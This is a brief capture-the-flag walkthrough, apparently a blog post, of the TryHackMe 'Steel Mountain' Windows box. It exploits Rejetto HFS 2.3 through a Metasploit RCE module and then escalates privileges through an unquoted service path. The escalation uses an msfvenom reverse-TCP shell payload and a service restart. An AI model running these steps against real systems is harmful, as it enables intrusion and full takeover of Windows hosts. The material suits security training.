Steel Mountain - THM - Braindump

After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80, shows an image and nothing more. Nothing found using dirbuster.

There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejettohfsexec, let's try this one. 

Seems to work, meterpreter shell opened. We are user bill in a steelmountain domain. We can get the user flag in his desktop. Now we need a privesc vector.

We can use PowerUp loading it with meterpreter, it shows an unquoted service path escalation vector. We could have found this by running 'powershell -c "Get-Service"' as well. We can use msfvenom to create a suitable payload with the following command:

└─# msfvenom -p windows/shellreversetcp lhost= lport=2222 -f exe -o Advanced.exe
We can then upload it in the proper directory and restart the service running (in a Powershell shell):
Restart-Service -name AdvancedSystemCareService9
We are now NT authority system, job done

You'll only receive email when they publish something new.

More from emacab98
All posts